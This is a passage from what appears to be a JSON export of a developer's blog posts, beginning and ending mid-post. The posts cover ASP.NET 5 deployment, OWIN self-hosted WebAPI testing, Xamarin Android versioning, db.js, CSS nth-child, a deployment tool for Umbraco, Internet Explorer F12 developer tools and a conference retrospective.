This is when you’ll hit your path length error, but you know you probably don’t have any need to have your node_modules folder (or bower_components for that matter) in your production instance and to avoid this you want to work with another part of the package.json file, packExclude.\nThe packExclude property allows you to specify files and folders which you don’t want included when the app is packaged for deployment (or packaged for other reasons), so you’ll probably want it looking something like this:\n"packExclude": [ "bower.json", "package.json", "gruntfile.js", "bower_components/**/*.*", "node_modules/**/*.*", "grunt/**/*.*", "**.kproj", "**.user", "**.vspscc" ] Now when Azure copies your app around it won’t copy the files you have no need for on a production instance.\nConclusionWhen deploying an ASPNet5 app to Azure (and likely any other hosting platforms) hooking into the events is the best way to combine the .NET and client build process.\nAlso make sure that you exclude from the package anything you wouldn’t want on the production instance.\n", "id": "2015-01-02-running-grunt-tasks-when-deploying-aspnet5-apps" }, { "title": "A consultants approach to painting", "url": "https://www.aaron-powell.com/posts/2015-01-01-a-consultant-approach-to-painting/", "date": "Thu, 01 Jan 2015 00:00:00 +0000", "tags": [ "random" ], "description": "I recently did some painting of our house and here's how to approach it like an IT consultant.", "content": "A few months ago my PO, aka wife, pitched a new project, painting our lounge room. She decided to go to market and find the right people to do the project. Since it’s my home too I decided to respond to the RFP as c’mon, how hard can painting a room really be?\nAfter a couple of different quotes came in I managed to win the work, being the cheapest option (the whole free labor thing won out) but there was a condition, as I don’t have much practical experience I would start with a PoC, painting my study. Based on the outcome of the PoC I might be given the rest of the project.\nYou won the work, now what?Since I’ve now won the work I actually have to do it. The problem is that I don’t really have any painting experience (well except that finger painting I did for my parents in high school). Sure I’ve got theoretical experience and I’ve watched those renovation shows but I’ve never actually painted a room and being a good consultant nothing is beyond me, I can adapt on the fly.\nThe first step though was to approach my PO about scaling up the team from 1 to 2 people and bring in someone with more experience, my father. The PO agreed and I organised for my parents to stay after Christmas so undertake the project.\nD-DayOn Boxing Day we’re at our house after again consuming way too much food and while the project doesn’t actually kick off until the next day we decided to do some preliminary analysis of the work required. We started by stripping the paint off the door frame. After a few hours at this and uncovering that there was a least 5 different colour layers in the paint we approached the PO to renegotiate the project, it wouldn’t be feasible to strip all the skirting boards as well as paint the room. 
But this is the advantage of an agile project, we were able to identify a problem early and change to reduce risk to the overall project.\nThe next morning we went out to pick up the supplies that we needed, paints for the various colours that the PO wanted and set to patching a part of the celling which we’d had repaired by not repainted.\nTo paint the study we would need to move some of the bookshelves away from the wall but we also decided that we’d add some more storage by stacking them. Well good thing that we did the ‘measure twice, cut once’ approach as we found out that our roof was ~5cm lower than we’d thought so we wouldn’t be able to stack the shelves. We presented this finding to our PO and that we’d need a new plan on how to increase the storage within the room. Through some discussions of the requirements we came up with a new plan, the shelves would move to a different wall and use up some whitespace in the room then we could put cupboards on the wall the shelves were originally on.\nSo we start painting the wall, paint over the patched roof and all goes swimmingly. In fact, the patched roof turned out a lot better than expected. Originally we planned to paint the whole roof but after a few coats over the patch it blended in perfectly meaning we wouldn’t need to do the whole roof. We present our findings to the PO during the demo that evening and talked about the fact that we were running ahead of schedule and planned to increase the backlog and actually do the lounge room.\nFighting scope creepWe’re moving fast through the backlog, we’d achieved our goal with the PoC (to prove we could paint a wall to the required level) and got further through the PoC than we’d expected on the first day and expaded our scope to cover the lounge room and hallway.\nBut like a true PO they started pushing for more, to paint our spare bedroom. This was going to really push the amount we’d commetted on in the allocated budget. We had to manage expectations, pointing out that we’d need to be doing three coats on the lounge and hallway, two on the feature panel and remounting all the pictures. When our PO realised that we’d be sacrificing quality for quantity the spare bedroom request was dropped.\nFinishing the projectAt about 8pm on New Years Eve I put the final coat of paint on the door frame, coming in just before the deadline of end of 2014 to finish the painting. There’s a few bugs that need to be fixed up later (a couple of places where the feature colour might have bleed dispite my tape effort) but they are in the backlog to be addressed when there is more time budgeted.\nTake awaysSomething that is always worth to remember is just how important it is to communicate. Approach your PO early when you find roadblocks or need to increase scope. The more visibility you have on a project the faster you can react to scope changes and even increase scope if needed.\nThe other take away? 
I don’t think I’ll be on any home renovation shows any time soon.\n", "id": "2015-01-01-a-consultant-approach-to-painting" }, { "title": "Hosting multiple WebAPI servers in a single process", "url": "https://www.aaron-powell.com/posts/2014-12-04-multiple-webapi-single-process/", "date": "Thu, 04 Dec 2014 00:00:00 +0000", "tags": [ "owin", "katana", "webapi", "testing" ], "description": "Have you ever wondered how you would go about hosting multiple WebAPI servers within a single process?", "content": "I’m currently working on a project which consists of three different ASP.Net applications that communicate in sequence, Server to Server to Server (to database if you want to get technical).\nBecause the communication channel is a little tricky we want to include some integration tests in the CI process to verify them, but this obviously means we need to have our servers up and running. This is a bit of a pain: we can either run all our sites in IIS, which means that Visual Studio needs to be run as an administrator, or we can use IIS Express; sure, we’re no longer requiring VS as admin, but now our tests will fail locally unless we’re running IIS Express. That’s not a deal breaker but it’s a bit of an overhead that’d lead to random test fails.\nWell conveniently we’re using WebAPI2 controllers to communicate across each server, which leaves us with another option - self hosting. Well that could be an interesting option, we could spin up the servers using the OWIN self hosting inside the integration test. Yeah, let’s do that!\nMicrosoft.Owin.TestServer\nMy first thought was to use this test helper which Microsoft provides. In fact I’ve used it in the past for integration testing WebAPI but I’ve never tried to run two of them in the same process.\nI fired it up and what do you know, it didn’t work. So I started digging through the source to try and work out what it does and how it does it. As it turns out this helper creates a server which doesn’t actually run over the networking stack, everything is done in memory and this is going to be a problem: with no networking stack how are you meant to make an HttpClient call from one server to the other? Also this is all in a single process, that could just be a problem…\nAlright, let’s scratch this as an option.\nMicrosoft.Owin.SelfHost\nOn to our next option, using the normal Self Host framework, and we’ll sit that on top of HttpListener. This means we can run separate servers on separate endpoints, making it easier to do things that need networking, like calling on HttpClient.\nSetting up a Self Host isn’t too hard, so I added to the test class constructor a call to start up both servers.\npublic class MyTestClass : IDisposable { private readonly IDisposable serverA; private readonly IDisposable serverB; public MyTestClass() { serverA = WebApp.Startup("http://localhost:90", app => { var startup = new ServerA.Startup(); startup.Configuration(app); }); serverB = WebApp.Startup("http://localhost:91", app => { var startup = new ServerB.Startup(); startup.Configuration(app); }); } [Fact] public void ServerA_can_talk_to_ServerB() { var client = new HttpClient(); var result = client.GetAsync("http://localhost:90/api/echo").Result; result.StatusCode.ShouldBe(HttpStatusCode.OK); } public void Dispose() { serverA.Dispose(); serverB.Dispose(); } } Fantastic, that should do exactly what we want right? We’ve got two servers, separate ports, etc.
Well crap there’s a problem, I have EchoController in both of my servers and this is resulting in a 500 error saying that WebAPI doesn’t know whether to use ServerA.Controllers.EchoController or ServerB.Controllers.EchoController.\nWait… what? Why is ServerA getting access to all of the controllers in ServerB? That doesn’t seem right now does it? And I didn’t setup my configurations to do that. The only logical conclusion is that it’s an issue with the AppDomain, so I did some more digging.\nIAssembliesResolver Chatting to some of the folks in the JabbR OWIN room I was pointed towards this interface, in a WebAPI project it is what does the resolution of the controllers. It’s normally running as the DefaultAssembliesResolver class and it returns the list of assemblies from the current AppDomain. Well then I guess we have our answer, we are getting cross-AppDomain issues. Well then, what’s the solution? Let’s create our own implementation of IAssembliesResolver:\npublic class IntegrationTestAssembliesResolver : IAssembliesResolver { public ICollection<Assembly> GetAssemblies() { return new[] { this.GetType().Assembly }; } } That’s easy enough, so how do we use it? Well we have to shoehorn it into our WebAPI pipeline when the test server boots up. I’m doing this by adding it to part of the Startup class but I only want it when we’re running WebAPI in a self-host, or more importantly when it’s running in a test. To do that I’ll tell my OWIN apps that it’s running in a test:\npublic MyTestClass() { serverA = WebApp.Startup("http://localhost:90", app => { app.Properties.Add("TestServer", true); var startup = new ServerA.Startup(); startup.Configuration(app); }); serverB = WebApp.Startup("http://localhost:91", app => { app.Properties.Add("TestServer", true); var startup = new ServerB.Startup(); startup.Configuration(app); }); } Now to update our Startup:\npublic class Startup { public void Configuration(IAppBuilder app) { var config = new HttpConfiguration(); if (app.Properties.ContainsKey("TestServer")) { var ar = new IntegrationTestAssembliesResolver(); config.Services.Replace(typeof(System.Web.Http.Dispatcher.IAssembliesResolver), ar); } WebApiConfig.Register(config); } } Put that into both of our Startup classes and there we go!\nConclusionThere we have it, it all boils down to setting the IAssembliesResolver to only work within its own assembly scope you can run as many OWIN servers in a single process on as many endpoints as you want.\n", "id": "2014-12-04-multiple-webapi-single-process" }, { "title": "Versioning Xamarin Android apps", "url": "https://www.aaron-powell.com/posts/2014-09-22-versioning-xamarin-android-apps/", "date": "Fri, 26 Sep 2014 00:00:00 +0000", "tags": [ "xamarin" ], "description": "When creating Xamarin apps from a CI process like TeamCity it can be useful to generate the version accordingly.", "content": "I’m currently working on a Xamarin application with an Android target. 
We have setup a CI environment using TeamCity as Xamarin describes but what we wanted to do was create an app version accordingly so when we push a CI build you know there’s an update and which build it is from.\nSo I decided to do some investigation into how Android applications are versioned and what I found is:\nThere is an AndroidManifest.xml This has a versionName attribute in the XML which represents the application version There is a versionCode attribute in the XML which represents an interal application code Sweet, XML is pretty easy to modify, now how can we modify it so that when we run MSBuild over the Android csproj file?\nConveniently Jason Stangroome had previously given me a MSBuild task for updating the AssemblyInfo with a version number that you provide. Well I’m not needing to update the AssemblyInfo, instead I want to update the AndroidManifest, so I just modified the code to instead of writing a *.cs file to manipulate XML, using C#.\nNext challenge - I didn’t want to override the AndroidManifest.xml as that has a problem of file locking (I’m opening it to read the XML so it’s locked) and anyway I don’t want to update it as it’d be useful to see the new file if/when I need in the build output. So that begs the question, how do I get the Xamarin transpiler to understand that there is a different AndroidManifest.xml I want it to use?\nWell, if you poke into the Android project’s csproj file you’ll come across this:\n<AndroidManifest>Properties\\AndroidManifest.xml</AndroidManifest> Right, so now I have two choices, I can either update that file path or provide a replacement AndroidManifest property in MSBuild. It turns out that the latter was just as easy as the Xamarin Android engine really only cares about the last AndroidManifest that it finds.\nFinally there’s the question of “when the do I run my MSBuild task?” and that was a bit tricky to work out. For that I needed to have a look when the AndroidManifest is loaded up so I can run before that target runs. A bit of MSBuild verbose logging later I narrowed it down to _ValidateAndroidPackageProperties, which loads up the manifest, parses it for validity and continues on. With this knowledge we can add a BeforeTargets="_ValidateAndroidPackageProperties" to our target and we’re done.\nConclusionWith a bit of XML manipulation it’s pretty easy to customise the application version of a Xamarin Android application. I’ve created a NuGet package if anyone would like to use it, just:\nPM> Install-Package Readify.Xamarin.MSBuild.Android And pass in the argument:\nmsbuild MyAndroidApp.csproj /t:SignAndroidPackage /p:AppVersion=1.0.0.1 ", "id": "2014-09-22-versioning-xamarin-android-apps" }, { "title": "Add or update with db.js", "url": "https://www.aaron-powell.com/posts/2014-09-11-add-or-update-dbjs/", "date": "Thu, 11 Sep 2014 00:00:00 +0000", "tags": [ "db.js", "indexeddb" ], "description": "A common question with db.js is how to merge data from a remote store into the local store. When doing so you need to think about how you're handling an add vs an update statement.", "content": "A common question with db.js is how to merge data from a remote store into the local store. When doing so you need to think about how you’re handling an add vs an update statement.\nSay you have some records that you’re syncing between the two instances and they have a common key that you use to identify on both the client and the server. 
When a user hits the site you pull down the records and want to work out if they are to be inserted or just updated against what you already have.\nWell db.js exposes two methods, add and update which take an item and well, do what it sounds like. But this can make your code seem a bit confusing, do you need to perform a get first and find out if the record exists, and if it does then do an update otherwise do an add? That’d make it quite intensive a process as you have two operations for every record.\nI decided to crack open the IndexedDB spec and do some digging to see if I could work out the best way to go about this. The logical starting place for this is with the Object Store Storage Operation for you see there are two methods for adding items into an IndexedDB store, there is the add method and there is the put method.\nSo what’s the difference between the two? Well it comes down to point #4 of the Object Store Storage Operation:\nIf the no-overwrite flag was passed to these steps and is set, and a record already exists in store with its key equal to key, then this operation failed with a ConstraintError. Abort this algorithm without taking any further steps.\nThe difference is that add sets the no-overwrite flag to true where as put sets it to false, meaning that if you provide a “new” item to put it will perform an insert on the record.\nNow let’s get back to db.js, how does this fit into the picture? Well with db.js I don’t have a put method (at least not as of today), instead put is what the update method uses.\nTakeaway lessonIf you want to perform an add-or-update but don’t want to go through the overhead of doing a check if the record exists then you can just call the update method on your db.js store. Although it probably makes sense to rename the update method to put so it’s more consistent with the IndexedDB API, maybe I’ll just backlog that one.\n", "id": "2014-09-11-add-or-update-dbjs" }, { "title": "A simple expanding list in CSS only", "url": "https://www.aaron-powell.com/posts/2014-08-21-simple-expanding-list/", "date": "Thu, 21 Aug 2014 00:00:00 +0000", "tags": [ "css" ], "description": "Here's a simple approach to creating an expanding list with CSS.", "content": "Recently I was working on a site that needed to have an expanding list of items, the list is quite long but we wanted part of it hidden until the user clicks an option to expand it fully.\nI was thinking about how I’d done this in the past and what would be the simplest way to do it. Normally I’d just whip out a bit of JavaScript, find the ul, find any li’s beyond the count limiter and hide them and when the user clicks the button it’ll make them visible.\nThen it hit me, there’s a really simple way to hide the items with just CSS… nth-child.\nI’ve never really used nth-child in development, except for things like alternating rows, but you can leverage the maths capabilities to do something like this:\nul.hidden li:nth-child(n+10) { display: none; } And you’re done! Seriously, it’s that simple to hide items at a position greater than 10 in the list!\nThe way this works is that it leverages the positional nature of the nth-child’s n value, which represents the index of the item in the selector is matching. 
By providing a +10 to it we offset the position that the current pass matches, hiding it, so:\nFirst item - 0 + 10 -> match the 10th item Second item - 1 + 10 -> match the 11th item Eleventh item - 11 + 10 -> match the 21st item And there we have it, using the nth-child we can easily manipulate the elements with CSS as a while, rather than individually by explicitly finding each item.\nCheck out my demo to see it in action.\n", "id": "2014-08-21-simple-expanding-list" }, { "title": "5 years of DDD Melbourne", "url": "https://www.aaron-powell.com/posts/2014-07-22-5-years-of-dddmelb/", "date": "Tue, 22 Jul 2014 00:00:00 +0000", "tags": [ "dddmelb", "musing" ], "description": "A look back at the 5 years that has been DDD Melbourne", "content": "Last weekend saw me attending DDD Melbourne for the 5th year running and it also was the 5th year that I was attending as a speaker. I feel pretty honered to have been there all 5 years as a speaker, especially since it’s a community-voted event. The team even got me a new laptop bag, although I’m not sure what they are implying with the slogan :P\nI want to have a bit of a look back at my time.\nIn the beginningThe first DDD Melbourne was back in 2010 and at the time I was a reasonably unknown developer working for an agency in Sydney and having only recently moved from Melbourne to Sydney. Also I wasn’t really much of a conference person then either, I’d only been to one in the past. I was following a bunch of Readify developers on twitter at the time and they all started tweeting about DDD Melbourne, submitting talks, etc. So on a Friday after a few beers I decided “sure, I can totally present at a conference”, so I sat down and wrote an abstract, submitted it and waited to see.\nEvidently I bribed enough people, err, made an exciting enough a proposal and it got voted in.\nWell shit, that meant I actually had to write the talk and get up in front of people to talk. At the time I was a pretty shy guy, and while it seemed like a good idea at the time in the sober light of day the idea of being up in front of people speaking was nerveracking.\nBut I knew my material (it was an introduction to Umbraco) and people had voted for me to be there so if I could fake confidence well then I’d probably make it.\nWhat really surprised me was just how friendly everyone was. There was a bunch of people I’d only ever chatted to on twitter there. By the time I’d got to presenting I’d basically forgotten I was surrounded by people who were “strangers”, I was there with a bunch of mates who were there to heckle and be heckled (hmm… maybe that’s where my notoriety came from :P).\nMaking a returnIn 2011 I jumped at the chance to submit to DDD Melbourne, this time it was a JavaScript talk that I was doing and looking back I think it was my most risky talk to date. Rather than being a traditional talk where you have slides and stuff this was basically a pure coding session, exploring some fun things you can do with raw JavaScript. I still remember the rush of creating a pub/sub library front scratch in about 5 minutes and having people going “how the hell did you just whip that up?!”.\nI also learnt the peril that is live coding. Seriously, live coding for 1 hour is really hard work (for the record, I did have notes on another device, but still I had to at least transcribe everything).\nWhat I learnt about flaky internetWhen I came back in 2012 I brought a talk that taught me another valuable lesson about relying on the internet during a talk. 
This talk was adaptation of a lightning talk I’d given about doing everything in the browser, from coding to debugging, tests, CI and deployment. With a combination of Cloud9, GitHub, Travis-CI and Heroku I had a Node.js application that I was deving, testing and deploying. But with a 3g connection as my only bandwidth and being inside a lecture hall it wasn’t helping my cause.\nBut through the good natured audience that you get at DDD Melbourne, some good quality heckling and deliberately over the top hipster take on the concept meant that people saw the talk as as how it was meant to be seen, a look at things to come.\nIt’s kind of funny thinking back to that talk and realising that now it’s not such a bizzar idea in the .NET space through VSO and Azure!\nReverse heckling the keynote speakerLast year for my 4th talk I was doing a more deep-dive coding talk and back to my roots with a JavaScript talk. This time though it was more of a pre-canned set of examples rather than doing everything on-the-fly.\nExcept one thing. Last year’s keynote was given by Joe Albahari, the author of LINQPad, and in his talk about parallel processing there was a code snippet he showed on how to generate prime numbers using LINQ. Well part of my talk was on an idea that I’d been playing with, creating LINQ in JavaScript using ES6 generators.\nSo not to be out done during the keynote I quickly whipped up the same code in JavaScript! As fate would have it Joe was in my talk and I was like “Oh here’s Joe’s keynote snippet in JavaScript”, to which he countered “Can you make it run in parallel?”. Well no, JavaScript is single threaded, but he’d seen through my heckle (although I have worked out a way that involved generating web workers on the fly and such).\nThe year that wasAnd this leads up back to 2014 and my 5th talk. It was a bit of a departure from my usual this year, I went down the route of a less technical, more philosophical talk this time, exploring the concept that there are no bad ideas so long as you learn something. I used a few examples of “bad ideas” that I’ve developed recently.\nThis was a lot of fun a talk to give and present, there’s nothing better than talking about learning and encouraging other people to not be scared to tackle something they’ve always thought would be just a bad idea if they think they can learn something from it.\nConclusionWhat a journey it’s been, from a guy who was freaking out about getting up in front of an auidence to someone who can’t wait until next year and is already planning their talk submissions. DDD Melbourne has to be one of my favorite conferences out there. A big thanks to the team behind it for each year they out do the last one. An equally big thanks to the community who keeps having faith to bring me back each year.\nHere’s to another 5 years!\n", "id": "2014-07-22-5-years-of-dddmelb" }, { "title": "Introducing Chauffeur", "url": "https://www.aaron-powell.com/posts/2014-06-09-introducing-chauffeur/", "date": "Mon, 09 Jun 2014 00:00:00 +0000", "tags": [ "umbraco", "chauffeur", "deployment" ], "description": "Introducing Chauffeur, a new classy way to delivery changes around Umbraco instances.", "content": "Over the last few months I’ve been tweeting out information about a new Open Source project for Umbraco I’ve been working on called Chauffeur. 
In this post I want to introduce you to what Chauffeur is and what it can do for you and your Umbraco projects.\nElevator pitchDeployment is hard, getting changes from one environment with Umbraco has never been an easy problem to solve. Need to add a new Document Type then you end up with manual steps in the web UI, parsing files on first request and compare to the database, backup/restore or a combination of any of these.\nBut really these ‘structural items’ (Document Types, Data Types, Templates, Macros, etc) are the kinds of things that are a deployment step, until they are done you can’t really say that the new iteration of the site is ready.\nChauffeur comes at this problem from a different angle, to remove the human element from deployments. Be it deploying changed from one developers machine to another or from staging to production.\nYou should be able to automate these changes with repeatable scripts that can be run before the website comes up.\nBasically Chauffeur is a console application which you can run without having to start IIS to interact with Umbraco instances. So remove the human factor from doing your deployments. Make it simple, make it automated and make it repeatable.\nScreen Cast Because a picture paints 1000 words I decided to also do a simple screencast of Chauffeur, check it out, then continue reading to get a fuller picture.\nHello ChauffeurAt its core Chauffeur is a .NET host for Deliverables, which are something for Chauffeur do. This host can be hosted anywhere but the primary host is a console application, Chauffeur.Runner.exe. The executable is then run from inside the bin folder of your Umbraco instance so it can load up the whole Umbraco API.\nSo like I said you have Deliverables and this is something that Chaffer does it could be:\nInstalling the Umbraco database Import Data Types/Document Types/etc Provide information about the Document Types in your instance Chauffeur.Runner When you want to use Chauffeur you start it up with the Chauffeur.Runner.exe, this console application gives you a simple command prompt:\nFrom here you can execute a Deliverable, in this case I’ve used help:\nSo from help you can see all the Deliverables that are available, you can write your own too! In fact Chauffeur uses the same TypeFinder that Umbraco itself uses so discovery is done like in Umbraco itself.\nDeliverables The core of everything is the Deliverable and everything in Chauffeur is a Deliverable, including the Help system and quit!\nWhat a Deliverable does is entirely up to the author of it, you’ve got access to the Umbraco API’s… within reason, you won’t have anything that depends on HttpContext because well… it’s a console application! You can access the Umbraco API’s via constructor injection as Chauffeur has its own IoC container.\nA Deliverable has a name and option aliases. The name is the primary way you call it and it’s expected to be unique. Aliases are more like fall backs, only if a name isn’t found for what you typed in will Chauffeur look for an alias.\nLet’s say we use the install deliverable, it’d go like this:\nFirst of Chauffeur looked for a connection string (no connection string, it won’t work) and then at the provider. In the sample above I’ve used SQLCE and I didn’t have a sdf file on disk so Chauffeur has prompted to create one (if you’re not using SQLCE you’ll need to have the DB already on the server, or create a Deliverable to do that :P) and then it goes aheaad and runs all the Umbraco database scripts to create you an empty database. 
All of this is done via a console application so you didn’t need to start IIS to achieve it!\nDeliveriesOne of the goals of Chauffeur was the be automated so while being able to fire up a console application and type commands into it that’s not particularly automated so for that you can do one of two things:\nYou can pass the name of the Deliverable via the CLI Use the delivery command The Delivery This is a unique Deliverable in that it doesn’t do anything against Umbraco directly, instead you create a Delivery file which is a series of Deliverables to be executed, like so:\n## 001-install.delivery install y user change-password 0 default my-secret-password package DataTypes package DocumentTypes package Macros So this delivery will install Umbraco (and the y flag will be passed to the prompt to create a SQLCE file) then update the user password then import a series of Data Types, Document Types and Macros.\nWhen running the delivery Deliverable:\numbraco> delivery It will do a scan of the Chauffeur directory (App_Data\\Chauffeur) for all *.delivery files, order them by their name (which is why I’ve used a numerical prefix) and then execute each Deliverable one-by-one.\nOnce it completes it then tracks that the delivery has been run and it won’t run it again, so if you keep using delivery one an environment it won’t try and delivery deliveries that have previously been delivered!\nThe idea is that you check all your *.delivery files into source control (maybe do something smarter around the user password though…) so you can then get everything from source control and easily setup the whole environment without the need for database backup/restore processes.\nGetting ChauffeurChauffeur is currently only available as a set of NuGet packages, the Chauffeur and Chauffeur.Runner are separate so if you want to write your own Deliverables you don’t need the exe.\nChauffeur also requires you to be using Umbraco 7.1.1 because there have been a few bug fixes and more importantly the new Membership API.\nYou can also get the latest build via the NuGet feed from our build server.\nFinally this is an Open Source project and you can find it on GitHub including more documentation.\nConclusionI’m really excited by Chauffeur and the idea of doing automation of deployments with Umbraco in a way which doesn’t require user interaction.\n", "id": "2014-06-09-introducing-chauffeur" }, { "title": "F12 Refresh - CSS editor", "url": "https://www.aaron-powell.com/posts/2014-04-03-f12-refresh-css-editor/", "date": "Thu, 03 Apr 2014 00:00:00 +0000", "tags": [ "css", "f12", "internet-explorer" ], "description": "A look at the CSS editor improvements in the F12 tooling refresh", "content": "One of the new features in the F12 refresh is some updates to the CSS editor so let’s have a look at those updates.\nTracking what changedAs a web developer often I’m spending time in the browser on the dev tools tweaking the CSS of the page to try out changes to the CSS without having to reload the page. The main pain with all of this is that if you’re making lots of changes across multiple elements it’s easy to lose track of what you changed.\nWith the F12 refresh we now get some visual indicators in the Styles tab which will highlight different colours depending on what you’ve done; if you’ve changed a setting then it’ll have an orange highlight next to it, removed properties (actually deleted, not just unchecked) will be highlighted with red and new properties will be highlighted green. 
Here is it in action:\nThat’s all well and good but when you’re doing changes across multiple DOM elements it can be a bit tricky still, as the style list still only shows you what is the change of the current DOM element, and selectors relevant to it. To combat this the F12 team have added a new tab to the CSS panel called Changes. This new panel does an inline diff of all the changes across all stylesheets within your web application. The changes also have the line number where the selector starts which you can also click in and navigate into the file within F12. If you’ve created an inline rule that will be listed with the selector for the element. You can even create new rules and they’ll appear in the list as well. Here’s it in action:\nToggling statesThere are a few states of DOM elements that can be useful to style, the hover and visited states. The problem is that these states can be tricky to simulate, particularly hover, it’s kind of hard to hover an element and tweak it within the dev tools at the same time. With the F12 refresh we now have an option on the right which we can use to hide/show these pseudo states and toggle them on and off:\nNote: Changing theses pseudo states only toggles their visual state not the true element state meaning that it won’t trigger the events associated with them.\nConclusionThat wraps up our look at some of the new features related to the style editor in Internet Explorer’s F12 tools. If you’ve got any feedback make sure you ping the @IEDevChat twitter account and let them know. Also don’t forget to checkout modern.ie to get trial versions of Windows with Internet Explorer.\n", "id": "2014-04-03-f12-refresh-css-editor" }, { "title": "F12 Refresh - The JavaScript Console", "url": "https://www.aaron-powell.com/posts/2014-04-03-f12-refresh-the-javascript-console/", "date": "Thu, 03 Apr 2014 00:00:00 +0000", "tags": [ "javascript", "f12", "internet-explorer" ], "description": "A look at the JavaScript console improvements in the F12 tooling refresh", "content": "One of the new features in the F12 refresh is some updates to the JavaScript console so let’s have a look at those updates.\nconsole.logI’ve previously complained about how the console.log method in IE doesn’t like it when you pass an object to it, it just outputs [object Object] meaning it just executed a toString on the object.\nI can happily confirm that this has been fixed! When you pass an object, multiple objects or formatted strings it operates as it does in the other browser dev tools.\n$_If you’ve used other browsers dev tools there’s a chance you’ve come across $_. This variable is added by the dev tools which represents the result of the last expression. This can be useful when running through execution stacks and you’re not capturing output, particularly when you’re running through the debugger.\nMinor improvementsThere’s another few things which are fairly minor and not particularly obvious such as:\nThere’s now a button on the Console toolbar which you can prevent the console being cleared on each request. By default this turned on, meaning the console will be cleared on each request. There’s obvious performance impacts by turning this off as the dev tools are maintaining state Under the Internet Explorer settings there is now a property you can set which will enable the console even when F12 isn’t active. 
This setting is off by default as again it can be a performance hit so it’s worthwhile only turning it on as-needed ConclusionThat wraps up our look at some of the new features related to the style editor in Internet Explorer’s F12 tools. If you’ve got any feedback make sure you ping the @IEDevChat twitter account and let them know. Also don’t forget to checkout modern.ie to get trial versions of Windows with Internet Explorer.\n", "id": "2014-04-03-f12-refresh-the-javascript-console" }, { "title": "F12 Refresh - The JavaScript Debugger", "url": "https://www.aaron-powell.com/posts/2014-04-03-f12-refresh-the-javascript-debugger/", "date": "Thu, 03 Apr 2014 00:00:00 +0000", "tags": [ "javascript", "debugging", "f12", "internet-explorer" ], "description": "A look at the JavaScript console improvements in the F12 tooling refresh", "content": "One of the new features in the F12 refresh is some improvements to the JavaScript debugger so let’s have a look at those updates.\nSource maps\nHaven’t heard of source maps? Well then you should start here, but basically source maps are a way to provide debugging information from generated JavaScript output, either generated from a transpiler or from a minifier.\nOver the last 12 months in particular source maps have really taken off and they can really make it easy to solve problems without needing the direct sources, which as a .NET developer this is something that I’ve grown up using.\nI’m excited that this has been included in the F12 refresh which has just dropped. By default they are turned on when you’re in the script debugger so you immediately start debugging your original sources rather than the generated sources and having to opt into source maps:\nIn the above I’m debugging the source of a website called font dragr by @ryanseddon which is an AngularJS app that was minified with UglifyJS2 which is a minifier that will generate a source map for the minified file. You can see in the source list there it multiple files listed, but if you look at the HTML only a single JavaScript file is served, named scripts.js. So far it seems there are a few issues still, the breakpoint positioning can be a bit iffy (as you can see above) and debugging doesn’t seem to track variable names properly so the locals and console will respond to the minified name rather than the original. I asked the F12 team about this and apparently it’s to do with a limitation in the source maps spec, there’s not enough data to map the variable names so it’s something we’re stuck with at the moment.\nThere’s a few other nice things about the source maps implementation, there’s a button on the toolbar which will allow you to swap between original and “decompiled” sources, so if you don’t know what the generated variable name is you can swap to the original source, turn on pretty print and look at it before going back to the source map debugger.\nThey’ve also included some syntax highlighting for popular transpiler languages like CoffeeScript and TypeScript to make the debugging experience nicer. If you’re using other languages, say Traceur or Sweet.js, you’ll just lack syntax highlighting for the debugger. 
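For reference, the way F12 (and the other dev tools) knows a map exists at all is the standard trailing comment a minifier or transpiler appends to the generated file; the file names here are just illustrative:

// the very last line of the generated scripts.js
//# sourceMappingURL=scripts.js.map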
Also when you have source maps turned on the search will search the source mapped code, not the original source.\nJust My Code debuggingHow many times have you been debugging JavaScript and had this happen:\nYep you’ve accidently clicked Step Into and found yourself inside jQuery/AnguarJS/etc which you now want to get back out of because you’re not really wanting to debug these libraries. You go to swap back up the callstack to your code but get the breakpoint wrong and continue past where you were trying to debug anyway.\nWell with the F12 refresh there is a really cool new feature which allows you to make script files as library files and when they are marked as such these scripts will be skipped by the debugger! They’ll also be hidden within the callstack as external code so you can see that your call has gone through code which is outside your control.\nTo enable this feature you need to open the list of scripts (Ctrl + O) and then click the option on the scripts you want marked as a library and ignored. As you can see above it will avoid any step-into calls you try and do and even run all the way through if you have no more code that isn’t marked as library code at the end. This can also be combined with source maps to skip over decomplied libraries.\nOther minor improvementsThere’s a few small improvements that are easy to miss, like the fact that breakpoints and watch variables are now remembered when you close the dev tools. Or that the console understands the debugging context and has autocomplete on what’s in scope.\nConclusionThat wraps up our look at some of the new features related to the style editor in Internet Explorer’s F12 tools. If you’ve got any feedback make sure you ping the @IEDevChat twitter account and let them know. Also don’t forget to checkout modern.ie to get trial versions of Windows with Internet Explorer.\n", "id": "2014-04-03-f12-refresh-the-javascript-debugger" }, { "title": "Introducing status.modern.ie", "url": "https://www.aaron-powell.com/posts/2014-04-03-introduction-status-modern-ie/", "date": "Thu, 03 Apr 2014 00:00:00 +0000", "tags": [ "internet-explorer" ], "description": "Introducing a new website to help track the development status of features in Internet Explorer", "content": "Today there was an exciting announcement from the IE Dev relations team, the team behind IE Dev Chat and modern.IE. At Build they announced a new website to help developers track progress of features, status.modern.ie.\nThis website is similar to the Chrome Status dashboard where web developers can get an insight into what is happening with feature development.\nThrough status.modern.ie we can see what features the IE team is considering or has under development already, or features that are currently not being pursued.\nFor example we can see they are developing cross-domain font loading or that the Battery Status API is something that they are considering. You can also see what version a particular feature dropped in IE along with links to the relevant documentation.\nAs a web developer and someone who is passionate about IE it’s create to see the IE team starting to become more open in their progress, giving us an insight into what features they are considering for upcoming versions of IE. 
Hopefully this is a sign of changes to come and the IE team continues down the path of being more open with what their road map is.\nSo go check out status.modern.ie and if you’ve got any feedback get in contact with me or ping @IEDevChat on twitter.\n", "id": "2014-04-03-introduction-status-modern-ie" }, { "title": "Debugging jQuery events", "url": "https://www.aaron-powell.com/posts/2014-03-06-debugging-jquery-events/", "date": "Thu, 06 Mar 2014 00:00:00 +0000", "tags": [ "jquery", "debugging", "javascript" ], "description": "Ever had an event firing from jQuery but you don't know where in your code it's firing from?", "content": "Every couple of months I see a question come around where someone has a jQuery event handler that’s being fired but they don’t know where that is in their codebase.\nSo your first stop is the browser dev tools but then you hit something like this:\nWell crap, that’s not particularly helpful, it just shows us something in jQuery, and if I’m using a minified version of jQuery well then I’m really in trouble, it won’t be easy to debug at all.\nOk that’s not really helpful now is it, it’s not showing my event handler, it’s showing me something from jQuery internals.\nThe why To understand why we’re not seeing our event handler we need to understand a bit about how browser events work. Originally you were only able to attach a single event handler to any given DOM element, and that was like this:\nelement.onclick = function () { ... }; Before we had addEventListener everywhere jQuery gave us a way to add multiple events, by attaching its own event handler 